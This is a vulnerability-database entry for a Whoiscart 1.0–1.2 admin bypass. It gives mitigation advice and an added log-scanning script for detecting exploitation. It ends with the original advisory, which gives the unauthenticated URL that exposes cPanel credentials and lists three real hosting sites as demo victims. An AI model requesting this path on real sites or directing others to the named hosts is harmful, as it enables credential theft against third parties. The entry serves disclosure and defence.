Vendor: Whoiscart
By: Black Dream
CVSS: 8.8 (HIGH)
Type: Admin Bypass
CWE: 287 (Improper Authentication)
Product Name: Whoiscart
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: YES
Related CVE: CVE-2009-4456
CPE: a:whoiscart:whoiscart:1.0
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

WHOISCART ADMIN BYPASS

Whoiscart is a web-based application for managing domain names and the hosting accounts attached to them. Versions 1.0 through 1.2 serve the file admin/hostinginterfaces/cpanel_1_log.htm without any authentication check, so anyone who requests that URL directly reads the cPanel account credentials recorded in it. No admin login is needed: the attacker gets the same credential material the administrator would see (CWE-287, Improper Authentication).

Mitigation:

Upgrade to the latest version of Whoiscart (the entry above records that a patched version exists). Until the upgrade is in place, deny direct web access to the admin/hostinginterfaces directory at the web server, and treat every cPanel credential that was reachable through the exposed file as compromised and rotate it.
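
The following script is an added example, not part of the advisory or of Whoiscart itself. It does two things a practitioner wants after reading the entry above: it scans combined-format web-server access-log lines for requests to the exposed cpanel_1_log.htm path (to hunt for past exploitation), and it classifies the HTTP status that a direct, unauthenticated probe of the path returned (to confirm that the upgrade or the web-server deny rule actually took). The log lines are constructed sample data; the path is the one from the advisory, and the /whoiscart/ install prefix in the samples is an assumption, since the software may be installed under any directory.

```python
"""Detect requests for the unauthenticated Whoiscart admin file.

Added example, not the advisory's or the vendor's code. The access-log
lines and status codes below are constructed sample data.
"""
import re
from urllib.parse import urlparse

# Path named in the advisory, relative to the Whoiscart install directory.
EXPOSED_PATH = "/admin/hostinginterfaces/cpanel_1_log.htm"

# Combined log format: client, ident, auth-user, [time], "request", status, size, ...
# The auth-user field is "-" when no HTTP authentication was presented.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop any query string so "...cpanel_1_log.htm?x=1" still matches.
    rec["path"] = urlparse(rec["target"]).path
    return rec


def is_exposed_path(path):
    """Match the advisory path under any install prefix (assumption: prefix varies)."""
    return path.lower().endswith(EXPOSED_PATH)


def find_hits(log_lines):
    """Return (client, status, auth_user) for every request to the exposed file.

    A 200 with auth_user "-" is the exposure the advisory describes: the file
    was served with no authentication. Non-200 statuses are kept so an analyst
    can see probes that a deny rule or the upgrade stopped.
    """
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if rec and is_exposed_path(rec["path"]):
            hits.append((rec["client"], rec["status"], rec["user"]))
    return hits


def classify_probe(status):
    """Classify the status a direct, unauthenticated GET of the path returned."""
    if status == 200:
        return "EXPOSED: file served without authentication"
    if status in (401, 403):
        return "PROTECTED: access denied by the web server or application"
    if status == 404:
        return "ABSENT: file not present (removed, or a different version)"
    return "UNKNOWN: inspect the response manually"


# Constructed sample log lines (not real traffic); RFC 5737 test addresses.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jun/2009:10:01:02 +0000] '
    '"GET /whoiscart/admin/hostinginterfaces/cpanel_1_log.htm HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [29/Jun/2009:10:01:09 +0000] '
    '"GET /whoiscart/index.php HTTP/1.1" 200 1320 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Jun/2009:10:05:44 +0000] '
    '"GET /whoiscart/admin/hostinginterfaces/cpanel_1_log.htm?x=1 HTTP/1.1" 403 212 "-" "curl/7.19"',
]

if __name__ == "__main__":
    for client, status, user in find_hits(SAMPLE_LOG):
        print(f"{client} status={status} auth_user={user} -> {classify_probe(status)}")
```

Run it against the real access log by replacing SAMPLE_LOG with the file's lines; any 200 hit with auth_user "-" means the credentials in that file should be rotated, regardless of when the upgrade was applied.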

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\
+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     WHOISCART ADMIN BYPASS                                        |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
| HoMe   : www.sec-r1z.com                                                          |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: WHOISCART                                                                |
| Home...: http://whoiscart.net                                                     |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit:                                                                          |
|                                                                                   |
| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm                |
|                                                                                   |
| [+] Demo                                                                          |
|                                                                                   |
| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm   |
|                                                                                   |
| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm       |
|                                                                                   |
| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm      |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] account[pwd] xD   Pure admin                        |
|                                                                                   |
| [+] Enjoy xD                                                                      |
+-----------------------------------------------------------------------------------+

+===================================================================================+
|                                                                                   |
| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
|                       And All #sec-r1z memb3rz!!!!                                |
+===================================================================================+
E0D|F

# milw0rm.com [2009-06-29]